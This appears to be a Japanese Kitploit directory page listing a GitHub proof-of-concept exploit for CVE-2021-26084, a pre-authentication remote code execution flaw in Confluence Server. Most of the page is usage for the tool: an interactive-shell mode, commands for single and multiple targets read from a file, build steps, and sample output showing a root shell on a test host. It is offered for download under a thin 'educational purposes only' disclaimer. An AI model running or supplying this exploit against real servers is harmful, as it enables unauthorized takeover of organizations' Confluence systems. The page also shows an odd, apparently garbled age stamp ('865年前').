Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE) | Kitploit
ツール/GitHubGitHub/taythebot/cve-2021-26084
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

リポジトリを見る
865年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-26084

CVE-2021-26084 の概念実証

Confluence Server Webwork OGNL インジェクション(Pre-Auth RCE)

免責事項

これは教育目的のみです。私はあなたの行動に対して責任を負いません。自己責任で使用してください。

コマンドの制限

ペイロードの制約により、一部の文字を渡すことができません。以下はテスト中に見つけた文字です。

  • ダブルクォーテーション "
  • 縦棒 |

インタラクティブシェル

root@kitploit:~
 go run exploit.go -t <target> -i

例

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • 単一ターゲットのみで動作
  • インタラクティブシェルを終了するには exit と入力
  • 該当する場合、Windowsマシンであることが表示されます

単一ターゲット

root@kitploit:~
go run exploit.go -t <target> -c <command>

複数ターゲット

root@kitploit:~
go run exploit.go -f <file> -c <command>

ビルド

root@kitploit:~
go mod download
go build exploit.go
ツールをダウンロード